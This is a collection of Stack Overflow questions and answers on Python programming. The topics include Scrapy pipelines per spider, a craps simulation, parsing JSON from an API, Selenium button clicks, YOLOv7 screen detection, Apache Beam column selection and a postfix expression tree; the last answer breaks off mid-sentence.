default\n\nspider1.py\nclass Spider1(Spider):\n\n name = 'spider1'\n\n start_urls = [\"http://example.com\"]\n\n custom_settings = {\n 'SOMEPIPELINE_ENABLED': False\n }\n\nAs you check, we have specified custom_settings that will override the things specified in settings.py, and we are disabling SOMEPIPELINE_ENABLED for this spider.\nNow when you run this spider, check for something like:\n[scrapy] INFO: Enabled item pipelines: []\n\nNow scrapy has completely disabled the pipeline, not bothering of its existence for the whole run. Check that this also works for scrapy extensions and middlewares.\n", "You can use the name attribute of the spider in your pipeline\nclass CustomPipeline(object)\n\n def process_item(self, item, spider)\n if spider.name == 'spider1':\n # do something\n return item\n return item\n\nDefining all pipelines this way can accomplish what you want.\n", "I can think of at least four approaches:\n\nUse a different scrapy project per set of spiders+pipelines (might be appropriate if your spiders are different enough warrant being in different projects)\nOn the scrapy tool command line, change the pipeline setting with scrapy settings in between each invocation of your spider\nIsolate your spiders into their own scrapy tool commands, and define the default_settings['ITEM_PIPELINES'] on your command class to the pipeline list you want for that command. See line 6 of this example.\nIn the pipeline classes themselves, have process_item() check what spider it's running against, and do nothing if it should be ignored for that spider. See the example using resources per spider to get you started. (This seems like an ugly solution because it tightly couples spiders and item pipelines. You probably shouldn't use this one.)\n\n", "The most simple and effective solution is to set custom settings in each spider itself.\ncustom_settings = {'ITEM_PIPELINES': {'project_name.pipelines.SecondPipeline': 300}}\n\nAfter that you need to set them in the settings.py file\nITEM_PIPELINES = {\n 'project_name.pipelines.FistPipeline': 300,\n 'project_name.pipelines.SecondPipeline': 400\n}\n\nin that way each spider will use the respective pipeline.\n", "You can just set the item pipelines settings inside of the spider like this:\nclass CustomSpider(Spider):\n name = 'custom_spider'\n custom_settings = {\n 'ITEM_PIPELINES': {\n '__main__.PagePipeline': 400,\n '__main__.ProductPipeline': 300,\n },\n 'CONCURRENT_REQUESTS_PER_DOMAIN': 2\n }\n\nI can then split up a pipeline (or even use multiple pipelines) by adding a value to the loader/returned item that identifies which part of the spider sent items over. This way I won’t get any KeyError exceptions and I know which items should be available. \n ...\n def scrape_stuff(self, response):\n pageloader = PageLoader(\n PageItem(), response=response)\n\n pageloader.add_xpath('entire_page', '/html//text()')\n pageloader.add_value('item_type', 'page')\n yield pageloader.load_item()\n\n productloader = ProductLoader(\n ProductItem(), response=response)\n\n productloader.add_xpath('product_name', '//span[contains(text(), \"Example\")]')\n productloader.add_value('item_type', 'product')\n yield productloader.load_item()\n\nclass PagePipeline:\n def process_item(self, item, spider):\n if item['item_type'] == 'product':\n # do product stuff\n\n if item['item_type'] == 'page':\n # do page stuff\n\n", "I am using two pipelines, one for image download (MyImagesPipeline) and second for save data in mongodb (MongoPipeline).\nsuppose we have many spiders(spider1,spider2,...........),in my example spider1 and spider5 can not use MyImagesPipeline\nsettings.py\nITEM_PIPELINES = {'scrapycrawler.pipelines.MyImagesPipeline' : 1,'scrapycrawler.pipelines.MongoPipeline' : 2}\nIMAGES_STORE = '/var/www/scrapycrawler/dowload'\n\nAnd bellow complete code of pipeline\nimport scrapy\nimport string\nimport pymongo\nfrom scrapy.pipelines.images import ImagesPipeline\n\nclass MyImagesPipeline(ImagesPipeline):\n def process_item(self, item, spider):\n if spider.name not in ['spider1', 'spider5']:\n return super(ImagesPipeline, self).process_item(item, spider)\n else:\n return item \n\n def file_path(self, request, response=None, info=None):\n image_name = string.split(request.url, '/')[-1]\n dir1 = image_name[0]\n dir2 = image_name[1]\n return dir1 + '/' + dir2 + '/' +image_name\n\nclass MongoPipeline(object):\n\n collection_name = 'scrapy_items'\n collection_url='snapdeal_urls'\n\n def __init__(self, mongo_uri, mongo_db):\n self.mongo_uri = mongo_uri\n self.mongo_db = mongo_db\n\n @classmethod\n def from_crawler(cls, crawler):\n return cls(\n mongo_uri=crawler.settings.get('MONGO_URI'),\n mongo_db=crawler.settings.get('MONGO_DATABASE', 'scraping')\n )\n\n def open_spider(self, spider):\n self.client = pymongo.MongoClient(self.mongo_uri)\n self.db = self.client[self.mongo_db]\n\n def close_spider(self, spider):\n self.client.close()\n\n def process_item(self, item, spider):\n #self.db[self.collection_name].insert(dict(item))\n collection_name=item.get( 'collection_name', self.collection_name )\n self.db[collection_name].insert(dict(item))\n data = {}\n data['base_id'] = item['base_id']\n self.db[self.collection_url].update({\n 'base_id': item['base_id']\n }, {\n '$set': {\n 'image_download': 1\n }\n }, upsert=False, multi=True)\n return item\n\n", "we can use some conditions in pipeline as this\n # -*- coding: utf-8 -*-\nfrom scrapy_app.items import x\n\nclass SaveItemPipeline(object):\n def process_item(self, item, spider):\n if isinstance(item, x,):\n item.save()\n return item\n\n", "Simple but still useful solution.\nSpider code\n def parse(self, response):\n item = {}\n ... do parse stuff\n item['info'] = {'spider': 'Spider2'}\n\npipeline code\n def process_item(self, item, spider):\n if item['info']['spider'] == 'Spider1':\n logging.error('Spider1 pipeline works')\n elif item['info']['spider'] == 'Spider2':\n logging.error('Spider2 pipeline works')\n elif item['info']['spider'] == 'Spider3':\n logging.error('Spider3 pipeline works')\n\nHope this save some time for somebody!\n", "Overriding 'ITEM_PIPELINES' with custom settings per spider, as others have suggested, works well. However, I found I had a few distinct groups of pipelines I wanted to use for different categories of spiders. I wanted to be able to easily define the pipeline for a particular category of spider without a lot of thought, and I wanted to be able to update a pipeline category without editing each spider in that category individually.\nSo I created a new file called pipeline_definitions.py in the same directory as settings.py. pipeline_definitions.py contains functions like this:\ndef episode_pipelines():\n return {\n 'radio_scrape.pipelines.SaveEpisode': 100,\n }\n\ndef show_pipelines():\n return {\n 'radio_scrape.pipelines.SaveShow': 100,\n }\n\nThen in each spider I would import the specific function relevant for the spider:\nfrom radio_scrape.pipeline_definitions import episode_pipelines\n\nI then use that function in the custom settings assignment:\nclass RadioStationAEspisodesSpider(scrapy.Spider):\n name = 'radio_station_A_episodes' \n custom_settings = {\n 'ITEM_PIPELINES': episode_pipelines()\n }\n\n" ]
[ 169, 39, 17, 15, 12, 10, 6, 1, 1, 0, 0 ]
[]
[]
[ "python", "scrapy", "web_crawler" ]
stackoverflow_0008372703_python_scrapy_web_crawler.txt
Q: unexpected "None" in list i wanted to make a game where you guess the letter. and add a function that will show you all you incorrect guesses, so i made the list: incorrectguesses = [] and then i made it so it asks the user to guess the letter: while True: guess = input("what do you think the letter is?? ") if guess == secret_letter: print("you guessed it!") break else: incorrectguesses += [guess] and you can see that i added the guess to the list if it was wrong. then, i added a function to print out every item in the given list: def print_all_items(list_): for x in list_: print(x) and then i ran the function at the end of the loop: print(print_all_items(incorrectguesses)) but this was the result: what do you think the letter is?? a a None what do you think the letter is?? b a b None as you can see, it adds "None" to the end of the list. thanks if you could help me A: print(print_all_items(incorrectguesses)) You're printing the result of the print_all_items() function. However, that function has no return statement, so it returns None by default. So, the result of the function is None, and that gets printed. Since the function itself prints the results, I think you actually just want to call the function, not print its result. A: As someone else pointed earlier (beat me to it), it's because you are printing a function that has no return. (In depth explanation a the end). while True: guess = input("what do you think the letter is?? ") if guess == secret_letter: print("you guessed it!") break else: incorrectguesses += [guess] print_all_items(incorrectguesses) # ← You want to call the function, not print it. That way the function is being run, and prints the elements of incorrectguesses. Explanation When you do print(<something>), the print() function is waiting for a value to be returned. In this case because the <something> is a function, Python runs that function "inside" the print(). When your function print_all_items() is being run, it prints all the elements of the list. Once print_all_items() has finished running, and printed everything, the function doesn't return a value, so it defaults to None. Therefore, the value of the <something> the print(<something>) was waiting for is gets assigned a None value. I hope I could help!
unexpected "None" in list
i wanted to make a game where you guess the letter. and add a function that will show you all you incorrect guesses, so i made the list: incorrectguesses = [] and then i made it so it asks the user to guess the letter: while True: guess = input("what do you think the letter is?? ") if guess == secret_letter: print("you guessed it!") break else: incorrectguesses += [guess] and you can see that i added the guess to the list if it was wrong. then, i added a function to print out every item in the given list: def print_all_items(list_): for x in list_: print(x) and then i ran the function at the end of the loop: print(print_all_items(incorrectguesses)) but this was the result: what do you think the letter is?? a a None what do you think the letter is?? b a b None as you can see, it adds "None" to the end of the list. thanks if you could help me
[ "print(print_all_items(incorrectguesses))\n\nYou're printing the result of the print_all_items() function.\nHowever, that function has no return statement, so it returns None by default.\nSo, the result of the function is None, and that gets printed.\nSince the function itself prints the results, I think you actually just want to call the function, not print its result.\n", "As someone else pointed earlier (beat me to it), it's because you are printing a function that has no return. (In depth explanation a the end).\nwhile True:\n guess = input(\"what do you think the letter is?? \")\nif guess == secret_letter:\n print(\"you guessed it!\")\n break\nelse:\n incorrectguesses += [guess]\n print_all_items(incorrectguesses) # ←\n\nYou want to call the function, not print it.\nThat way the function is being run, and prints the elements of incorrectguesses.\n\nExplanation\nWhen you do print(<something>), the print() function is waiting for a value to be returned.\nIn this case because the <something> is a function, Python runs that function \"inside\" the print(). When your function print_all_items() is being run, it prints all the elements of the list. Once print_all_items() has finished running, and printed everything, the function doesn't return a value, so it defaults to None. Therefore, the value of the <something> the print(<something>) was waiting for is gets assigned a None value.\nI hope I could help!\n" ]
[ 3, 0 ]
[]
[]
[ "python", "python_3.x" ]
stackoverflow_0074593024_python_python_3.x.txt
Q: Producing probability of wins in Python craps game I have the logic down for this game of craps. My only problem right now is that I can't seem to get any output for finding the probability of wins for the game. Here is the code: from random import seed, randint def simulate(): die1 = randint(1, 6) die2 = randint(1, 6) roll = die1 + die2 first_roll = roll if first_roll == 7 or first_roll == 11: return True elif first_roll == 2 or first_roll == 3 or first_roll == 12: return False else: second_roll = randint(1, 6) + randint(1, 6) while second_roll != first_roll and second_roll != 7: if second_roll == first_roll: return True elif second_roll == 7: return False ## Main def probability(n): simulate() wins = 0 for i in range(n): if simulate() == 1: wins += 1 return print(probability(10000)) I want to find the probability of wins for 10000 trials. However, I don't get any output when running this code. Nothing shows up. Where am I going wrong on this? I have tried for a couple hours but nothing seems to be working for me. Please include code and what I was doing wrong. I know for a fact that it should be 49% but I can't seem to arrive at that answer. A: I am sorry for my latest answer, I didn't read that its craps game. from random import seed, randint def simulate(): die1 = randint(1, 6) die2 = randint(1, 6) roll = die1 + die2 first_roll = roll if first_roll == 7 or first_roll == 11: return True elif first_roll == 2 or first_roll == 3 or first_roll == 12: return False else: while True: second_roll = randint(1, 6) + randint(1, 6) if second_roll == first_roll: return True elif second_roll == 7: return False # Main def probability(n): wins = 0 for i in range(n): if simulate() == 1: wins += 1 return wins print(probability(100000)) I think its the answer, I changed the second part of simulate() where its returning True, when second_roll == first_roll, returning False when second_roll==7, and repeats that while loop by continue, if second_roll is equal to other number.
Producing probability of wins in Python craps game
I have the logic down for this game of craps. My only problem right now is that I can't seem to get any output for finding the probability of wins for the game. Here is the code: from random import seed, randint def simulate(): die1 = randint(1, 6) die2 = randint(1, 6) roll = die1 + die2 first_roll = roll if first_roll == 7 or first_roll == 11: return True elif first_roll == 2 or first_roll == 3 or first_roll == 12: return False else: second_roll = randint(1, 6) + randint(1, 6) while second_roll != first_roll and second_roll != 7: if second_roll == first_roll: return True elif second_roll == 7: return False ## Main def probability(n): simulate() wins = 0 for i in range(n): if simulate() == 1: wins += 1 return print(probability(10000)) I want to find the probability of wins for 10000 trials. However, I don't get any output when running this code. Nothing shows up. Where am I going wrong on this? I have tried for a couple hours but nothing seems to be working for me. Please include code and what I was doing wrong. I know for a fact that it should be 49% but I can't seem to arrive at that answer.
[ "I am sorry for my latest answer, I didn't read that its craps game.\nfrom random import seed, randint\n\ndef simulate():\n die1 = randint(1, 6)\n die2 = randint(1, 6)\n roll = die1 + die2\n\n first_roll = roll\n\n if first_roll == 7 or first_roll == 11:\n return True\n elif first_roll == 2 or first_roll == 3 or first_roll == 12:\n return False\n else:\n while True:\n second_roll = randint(1, 6) + randint(1, 6)\n\n if second_roll == first_roll:\n return True\n elif second_roll == 7:\n return False\n \n\n\n# Main\ndef probability(n):\n wins = 0\n for i in range(n):\n if simulate() == 1:\n wins += 1\n return wins\n\n\nprint(probability(100000))\n\nI think its the answer, I changed the second part of simulate()\nwhere its returning True, when second_roll == first_roll, returning False when second_roll==7, and repeats that while loop by continue, if second_roll is equal to other number.\n" ]
[ 0 ]
[]
[]
[ "python" ]
stackoverflow_0074592980_python.txt
Q: How would I put a API's output into different variables in Python? So I am using a riddle API and whenever it is ran it outputs it data like this: [ { "title": "The Magic House", "question": "There is a house,if it rains ,there is water in it and if it doesn't rain,there is water in it.what kind of house is that?", "answer": "bathroom" } ] How could I convert the title, question and answer from the API output into 3 different variables that could then be used in a program. If the API outputs that the Title =A ,the question = B, and answer = C ,then how would I make it so that in my code, Variable1=A,Variable2=B and Variable3=C? The API comes from API ninjas and here is the code provided with it: import requests api_url = 'https://api.api-ninjas.com/v1/riddles' response = requests.get(api_url, headers={'X-Api-Key': 'YOUR_API_KEY'}) if response.status_code == requests.codes.ok: print(response.text) else: print("Error:", response.status_code, response.text) How would I do this with the code provided? A: The response you received from the server looks like JSON so use json module to parse it. When you parse the response, you access the items like normal python list/dict: import json response_text = """[ { "title": "The Magic House", "question": "There is a house,if it rains ,there is water in it and if it doesn't rain,there is water in it.what kind of house is that?", "answer": "bathroom" } ]""" data = json.loads(response_text) for item in data: print("Title =", item["title"]) print("Question =", item["question"]) print("Answer =", item["answer"]) print(data) Prints: Title = The Magic House Question = There is a house,if it rains ,there is water in it and if it doesn't rain,there is water in it.what kind of house is that? Answer = bathroom
How would I put a API's output into different variables in Python?
So I am using a riddle API and whenever it is ran it outputs it data like this: [ { "title": "The Magic House", "question": "There is a house,if it rains ,there is water in it and if it doesn't rain,there is water in it.what kind of house is that?", "answer": "bathroom" } ] How could I convert the title, question and answer from the API output into 3 different variables that could then be used in a program. If the API outputs that the Title =A ,the question = B, and answer = C ,then how would I make it so that in my code, Variable1=A,Variable2=B and Variable3=C? The API comes from API ninjas and here is the code provided with it: import requests api_url = 'https://api.api-ninjas.com/v1/riddles' response = requests.get(api_url, headers={'X-Api-Key': 'YOUR_API_KEY'}) if response.status_code == requests.codes.ok: print(response.text) else: print("Error:", response.status_code, response.text) How would I do this with the code provided?
[ "The response you received from the server looks like JSON so use json module to parse it. When you parse the response, you access the items like normal python list/dict:\nimport json\n\nresponse_text = \"\"\"[\n {\n \"title\": \"The Magic House\",\n \"question\": \"There is a house,if it rains ,there is water in it and if it doesn't rain,there is water in it.what kind of house is that?\",\n \"answer\": \"bathroom\"\n }\n]\"\"\"\n\ndata = json.loads(response_text)\n\nfor item in data:\n print(\"Title =\", item[\"title\"])\n print(\"Question =\", item[\"question\"])\n print(\"Answer =\", item[\"answer\"])\n\nprint(data)\n\nPrints:\nTitle = The Magic House\nQuestion = There is a house,if it rains ,there is water in it and if it doesn't rain,there is water in it.what kind of house is that?\nAnswer = bathroom\n\n" ]
[ 1 ]
[]
[]
[ "api", "python", "python_3.9", "python_requests" ]
stackoverflow_0074592338_api_python_python_3.9_python_requests.txt
Q: Selenium clicking a specific button object from a list of objects with python I am grabbing a list of buttons, then I am attempting to click a specific button object, I collect all buttons (which contain details such as a name). I check the name, if I have already clicked on this button, pass, or else click this button object. The problem I am having is that the button doesn't have an ID so I am unsure of how to dynamically identify the button to click it (from the object in the loop). It doesn't have an HREF either. If it had an ID, I could grab the ID value and build a selenium click even such as browser.find_element(By.ID, "button-ID").click(). Any pointers would be appreciated. html = browser.page_source soup = BeautifulSoup(html, "lxml") buttons = soup.find_all('button', {'class', 'full-width'}) for button in buttons: button_soup = BeautifulSoup(str(button), 'lxml') name_div = button_soup.find('div', {'class': 'artdeco-entity-lockup__title'}) name = name_div.find('span', {'aria-hidden': 'true'}).text if name in lead_check: pass else: """HERE IS WHERE I NEED TO CLICK THE BUTTON OBJECT""" browser.find_element(By.CSS_SELECTOR, "button.full-width").click() Button Object (one button from loop) example <button class="full-width member-analytics-addon__cta-list-item-content member-analytics-addon-entity-list__link member-analytics-addon-entity-list__link--no-underline-hover" role="button" type="button"> <div class="member-analytics-addon-entity-list__entity artdeco-entity-lockup artdeco-entity-lockup--size-3 ember-view" id="112"> <div class="artdeco-entity-lockup__image artdeco-entity-lockup__image--type-circle ember-view" id="113" type="circle"> <div class="ivm-image-view-model"> <div class="ivm-view-attr__img-wrapper ivm-view-attr__img-wrapper--use-img-tag display-flex"> <!-- --> <img alt="" class="ivm-view-attr__img--centered EntityPhoto-circle-3 EntityPhoto-circle-3 lazy-image ember-view" height="48" id="114" loading="lazy" src="linktopic" width="48"/> </div> </div> <!-- --> </div> <div class="artdeco-entity-lockup__content ember-view member-analytics-addon-entity-list__entity-content" id="115"> <div> <div class="artdeco-entity-lockup__title ember-view member-analytics-addon-entity-list__entity-content-title" id="116"> <span dir="ltr"><span aria-hidden="true"><!-- -->John Smith<!-- --></span><span class="visually-hidden"><!-- -->View Johns’s profile<!-- --></span></span> </div> <div class="artdeco-entity-lockup__badge ember-view t-normal" id="117"><!-- --> <span aria-hidden="false" class="artdeco-entity-lockup__degree"> · 3rd </span> <!-- --><!-- --></div> <div class="artdeco-entity-lockup__subtitle ember-view" id="118"> <!-- -->Loves cats<!-- --> </div> <!-- --> </div> <!-- --> </div> </div> </button> A: I solved this by identifying a unique variable in each button, in this instance an IMG URL then dynamically located each with selenium. img_src = button_soup.find('img')['src'] path_location = "//img[contains(@src,'{}')]".format(img_src) browser.find_element(By.XPATH, path_location).click()
Selenium clicking a specific button object from a list of objects with python
I am grabbing a list of buttons, then I am attempting to click a specific button object, I collect all buttons (which contain details such as a name). I check the name, if I have already clicked on this button, pass, or else click this button object. The problem I am having is that the button doesn't have an ID so I am unsure of how to dynamically identify the button to click it (from the object in the loop). It doesn't have an HREF either. If it had an ID, I could grab the ID value and build a selenium click even such as browser.find_element(By.ID, "button-ID").click(). Any pointers would be appreciated. html = browser.page_source soup = BeautifulSoup(html, "lxml") buttons = soup.find_all('button', {'class', 'full-width'}) for button in buttons: button_soup = BeautifulSoup(str(button), 'lxml') name_div = button_soup.find('div', {'class': 'artdeco-entity-lockup__title'}) name = name_div.find('span', {'aria-hidden': 'true'}).text if name in lead_check: pass else: """HERE IS WHERE I NEED TO CLICK THE BUTTON OBJECT""" browser.find_element(By.CSS_SELECTOR, "button.full-width").click() Button Object (one button from loop) example <button class="full-width member-analytics-addon__cta-list-item-content member-analytics-addon-entity-list__link member-analytics-addon-entity-list__link--no-underline-hover" role="button" type="button"> <div class="member-analytics-addon-entity-list__entity artdeco-entity-lockup artdeco-entity-lockup--size-3 ember-view" id="112"> <div class="artdeco-entity-lockup__image artdeco-entity-lockup__image--type-circle ember-view" id="113" type="circle"> <div class="ivm-image-view-model"> <div class="ivm-view-attr__img-wrapper ivm-view-attr__img-wrapper--use-img-tag display-flex"> <!-- --> <img alt="" class="ivm-view-attr__img--centered EntityPhoto-circle-3 EntityPhoto-circle-3 lazy-image ember-view" height="48" id="114" loading="lazy" src="linktopic" width="48"/> </div> </div> <!-- --> </div> <div class="artdeco-entity-lockup__content ember-view member-analytics-addon-entity-list__entity-content" id="115"> <div> <div class="artdeco-entity-lockup__title ember-view member-analytics-addon-entity-list__entity-content-title" id="116"> <span dir="ltr"><span aria-hidden="true"><!-- -->John Smith<!-- --></span><span class="visually-hidden"><!-- -->View Johns’s profile<!-- --></span></span> </div> <div class="artdeco-entity-lockup__badge ember-view t-normal" id="117"><!-- --> <span aria-hidden="false" class="artdeco-entity-lockup__degree"> · 3rd </span> <!-- --><!-- --></div> <div class="artdeco-entity-lockup__subtitle ember-view" id="118"> <!-- -->Loves cats<!-- --> </div> <!-- --> </div> <!-- --> </div> </div> </button>
[ "I solved this by identifying a unique variable in each button, in this instance an IMG URL then dynamically located each with selenium.\nimg_src = button_soup.find('img')['src']\npath_location = \"//img[contains(@src,'{}')]\".format(img_src)\nbrowser.find_element(By.XPATH, path_location).click()\n\n" ]
[ 0 ]
[]
[]
[ "beautifulsoup", "python", "selenium" ]
stackoverflow_0074586418_beautifulsoup_python_selenium.txt
Q: Using custom yolov7 trained model on my screen What I know I have already trained a custom model using yolov7-tiny I am now trying to use it for object detection on screen The script I have: import mss import numpy as np import cv2 import time import keyboard import torch from hubconf import custom model = custom(path_or_model='yolov7-tiny-custom.pt') with mss.mss() as sct: monitor = {'top': 30, 'left': 0, 'width': 1152, 'height': 864} while True: t = time.time() img = np.array(sct.grab(monitor)) results = model(img) cv2.imshow('s', np.squeeze(results.render())) print('fps: {}'.format(1 / (time.time() - t))) cv2.waitKey(1) if keyboard.is_pressed('q'): break cv2.destroyAllWindows() The problem I know that everything works in that script, however when it finally detects an object, it wants to draw a rectangle on screen. I receive the following error: Traceback (most recent call last): File "c:\Users\ahmed\Desktop\PC\Repos\yolov7-custom\yolov7-custom\aimbot.py", line 20, in <module> cv2.imshow('s', np.squeeze(results.render())) File "c:\Users\ahmed\Desktop\PC\Repos\yolov7-custom\yolov7-custom\models\common.py", line 990, in render self.display(render=True) # render results File "c:\Users\ahmed\Desktop\PC\Repos\yolov7-custom\yolov7-custom\models\common.py", line 964, in display plot_one_box(box, img, label=label, color=colors[int(cls) % 10]) File "c:\Users\ahmed\Desktop\PC\Repos\yolov7-custom\yolov7-custom\utils\plots.py", line 62, in plot_one_box cv2.rectangle(img, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA) cv2.error: OpenCV(4.6.0) :-1: error: (-5:Bad argument) in function 'rectangle' > Overload resolution failed: > - Layout of the output array img is incompatible with cv::Mat > - Expected Ptr<cv::UMat> for argument 'img' > - argument for rectangle() given by name ('thickness') and position (4) > - argument for rectangle() given by name ('thickness') and position (4) Summary I'm not too sure whats going on here but I believe that when I take the screenshot, I convert it to an array and apply my model. When it wants to draw a rectangle, its unable to do so because the output array img is incompatible with OpenCV matrix. How can I fix that? A: I tried to reproduce your issue and combined your code with an available yolo-demo, but I couldn't find any issue that would return an error message like that in your question. You can check it in your environment: import mss import numpy as np import cv2 import torch import time model = torch.hub.load('ultralytics/yolov5', 'yolov5s') with mss.mss() as sct: monitor = {'top': 50, 'left': 50, 'width': 600, 'height': 400} while True: t = time.time() img = np.array(sct.grab(monitor)) img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) results = model(img) results.render() out = cv2.cvtColor(img, cv2.COLOR_RGB2BGR) cv2.imshow('s', out) print('fps: {}'.format(1 / (time.time() - t))) if cv2.waitKey(1) == 27: break cv2.destroyAllWindows() Output:
Using custom yolov7 trained model on my screen
What I know I have already trained a custom model using yolov7-tiny I am now trying to use it for object detection on screen The script I have: import mss import numpy as np import cv2 import time import keyboard import torch from hubconf import custom model = custom(path_or_model='yolov7-tiny-custom.pt') with mss.mss() as sct: monitor = {'top': 30, 'left': 0, 'width': 1152, 'height': 864} while True: t = time.time() img = np.array(sct.grab(monitor)) results = model(img) cv2.imshow('s', np.squeeze(results.render())) print('fps: {}'.format(1 / (time.time() - t))) cv2.waitKey(1) if keyboard.is_pressed('q'): break cv2.destroyAllWindows() The problem I know that everything works in that script, however when it finally detects an object, it wants to draw a rectangle on screen. I receive the following error: Traceback (most recent call last): File "c:\Users\ahmed\Desktop\PC\Repos\yolov7-custom\yolov7-custom\aimbot.py", line 20, in <module> cv2.imshow('s', np.squeeze(results.render())) File "c:\Users\ahmed\Desktop\PC\Repos\yolov7-custom\yolov7-custom\models\common.py", line 990, in render self.display(render=True) # render results File "c:\Users\ahmed\Desktop\PC\Repos\yolov7-custom\yolov7-custom\models\common.py", line 964, in display plot_one_box(box, img, label=label, color=colors[int(cls) % 10]) File "c:\Users\ahmed\Desktop\PC\Repos\yolov7-custom\yolov7-custom\utils\plots.py", line 62, in plot_one_box cv2.rectangle(img, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA) cv2.error: OpenCV(4.6.0) :-1: error: (-5:Bad argument) in function 'rectangle' > Overload resolution failed: > - Layout of the output array img is incompatible with cv::Mat > - Expected Ptr<cv::UMat> for argument 'img' > - argument for rectangle() given by name ('thickness') and position (4) > - argument for rectangle() given by name ('thickness') and position (4) Summary I'm not too sure whats going on here but I believe that when I take the screenshot, I convert it to an array and apply my model. When it wants to draw a rectangle, its unable to do so because the output array img is incompatible with OpenCV matrix. How can I fix that?
[ "I tried to reproduce your issue and combined your code with an available yolo-demo, but I couldn't find any issue that would return an error message like that in your question. You can check it in your environment:\nimport mss\nimport numpy as np\nimport cv2\nimport torch\nimport time\n\n\nmodel = torch.hub.load('ultralytics/yolov5', 'yolov5s')\n\nwith mss.mss() as sct:\n monitor = {'top': 50, 'left': 50, 'width': 600, 'height': 400}\n\n while True:\n t = time.time()\n\n img = np.array(sct.grab(monitor))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n results = model(img)\n results.render()\n out = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n cv2.imshow('s', out)\n\n print('fps: {}'.format(1 / (time.time() - t)))\n\n if cv2.waitKey(1) == 27:\n break\n\ncv2.destroyAllWindows()\n\nOutput:\n\n" ]
[ 1 ]
[]
[]
[ "object_detection", "opencv", "python", "yolo" ]
stackoverflow_0074590208_object_detection_opencv_python_yolo.txt
Q: Select some columns from PCollection (Apache Beam, Python) I have the following PCollection: And I want to select only 2 columns from that PCollection. I tried to do: def cut_data(data): return data[["WebSpeedRef", "WebSpeedAct"]] data_min = data_json | 'min' >> beam.Map(cut_data) but got an error. What is the simplest way to accomplish this. A: You could do this: disired_columns = ( dataset | beam.Map(lambda x: [x["column1"], x["column2"]]) )
Select some columns from PCollection (Apache Beam, Python)
I have the following PCollection: And I want to select only 2 columns from that PCollection. I tried to do: def cut_data(data): return data[["WebSpeedRef", "WebSpeedAct"]] data_min = data_json | 'min' >> beam.Map(cut_data) but got an error. What is the simplest way to accomplish this.
[ "You could do this:\ndisired_columns = (\n dataset\n | beam.Map(lambda x: [x[\"column1\"], x[\"column2\"]])\n)\n\n" ]
[ 0 ]
[]
[]
[ "apache_beam", "python" ]
stackoverflow_0061873428_apache_beam_python.txt
Q: How to fix 'NoneType' has no attribute 'key', when trying to compare a key value to a string I am writing a program where the user inputs a postfix expression and it outputs the answer. Current I am stuck when Using my 'evaluate' function within my for loop. Inside my For loop Main.py: else: # Debug Code print('{}: Else'.format(i)) print('{}: Length'.format(len(stack))) Node.right = stack.pop() Node.left = stack.pop() Node = TreeNode(str(i)) stack.push(str(i)) # Debug Code print('{}: Right Key'.format(Node.right)) print('{}: Left Key'.format(Node.left)) print('{}: Node Key'.format(Node.key)) print('{}: Node Key Type'.format(type(Node.key))) Node = evaluate(Node) stack.push(int(Node)) I am getting the error below: Traceback (most recent call last): File "c:\Users\dpr48\main.py", line 49, in <module> Node = evaluate(Node) File "c:\Users\dpr48\main.py", line 10, in evaluate return evaluate(node.left) + evaluate(node.right) File "c:\Users\dpr48\main.py", line 9, in evaluate if node.key == '+': AttributeError: 'NoneType' object has no attribute 'key' So my question is why is it not using the 'TreeNode' class to get the key value? As well as the line of code that should define the 'Node.left' as the 'stack.pop()' value and 'Node.right' as the 'stack.pop()' value ends up not changing either of them and leaves them as None, as found in the 'Debug Code' that I have implemented to see what the program is doing interenally. Provided each class used below: Main.py from Stack import Stack from TreeNode import TreeNode def evaluate(node): if node.key == '+': return evaluate(node.left) + evaluate(node.right) elif node.key == '-': return evaluate(node.left) - evaluate(node.right) elif node.key == '*': return evaluate(node.left) * evaluate(node.right) elif node.key == '/': return evaluate(node.left) / evaluate(node.right) else: return node.key stack = Stack() exp = "23+" list = [*exp] for i in list: if i.isdigit() is True: # Debug Code print('{}: True'.format(i)) Node = TreeNode(int(i)) stack.push(int(i)) else: # Debug Code print('{}: Else'.format(i)) print('{}: Length'.format(len(stack))) Node.right = stack.pop() Node.left = stack.pop() Node = TreeNode(str(i)) stack.push(str(i)) # Debug Code print('{}: Right Key'.format(Node.right)) print('{}: Left Key'.format(Node.left)) print('{}: Node Key'.format(Node.key)) print('{}: Node Key Type'.format(type(Node.key))) Node = evaluate(Node) stack.push(int(Node)) print(evaluate(stack.node)) Stack.py from Node import Node from LinkedList import LinkedList class Stack: def __init__(self): self.list = LinkedList() def push(self, new_item): # Create a new node to hold the item new_node = Node(new_item) # Insert the node as the list head (top of stack) self.list.prepend(new_node) def pop(self): # Copy data from list's head node (stack's top node) popped_item = self.list.head.data # Remove list head self.list.remove_after(None) # Return the popped item return popped_item def __len__(self): node = self.list.head # Start at head of stack to count until stack returns Null count = 0 while node != None: node = node.next count+=1 return count # Returning length of stack LinkedList.py class LinkedList: def __init__(self): self.head = None self.tail = None def append(self, new_node): if self.head == None: self.head = new_node self.tail = new_node else: self.tail.next = new_node self.tail = new_node def prepend(self, new_node): if self.head == None: self.head = new_node self.tail = new_node else: new_node.next = self.head self.head = new_node def insert_after(self, current_node, new_node): if self.head == None: self.head = new_node self.tail = new_node elif current_node is self.tail: self.tail.next = new_node self.tail = new_node else: new_node.next = current_node.next current_node.next = new_node def remove_after(self, current_node): # Special case, remove head if (current_node == None) and (self.head != None): succeeding_node = self.head.next self.head = succeeding_node if succeeding_node == None: # Remove last item self.tail = None elif current_node.next != None: succeeding_node = current_node.next.next current_node.next = succeeding_node if succeeding_node == None: # Remove tail self.tail = current_node Node.py class Node: def __init__(self, initial_data): self.data = initial_data self.next = None TreeNode.py class TreeNode: # Constructor assigns the given key, with left and right # children assigned with None. def __init__(self, key): self.key = key self.left = None self.right = None A: There are several issues: Node is the name of a class, yet you use the same name for a TreeNode instance, shadowing the class name. This is not the main problem, but certainly not advised. Related: Don't use PascalCase for instances, but camelCase. So node, not Node. You assign to Node.right when you have not yet defined Node yet, which happens later with Node = TreeNode(str(i)). You should first assign to Node (well, better node) and only then assign to its attributes. With Node.right = stack.pop() you clearly expect the stack to contain TreeNode instances, but with stack.push(str(i)) you push strings. That will lead to the problems you describe. The stack should not be populated with strings, but with TreeNode objects. At the end of the else block you call evaluate, and then push that result value to the stack. This is wrong and should be removed. The evaluation should only happen when you have completed the tree, and it should not involve the stack. The stack has a role in building the tree, not in evaluating it. The 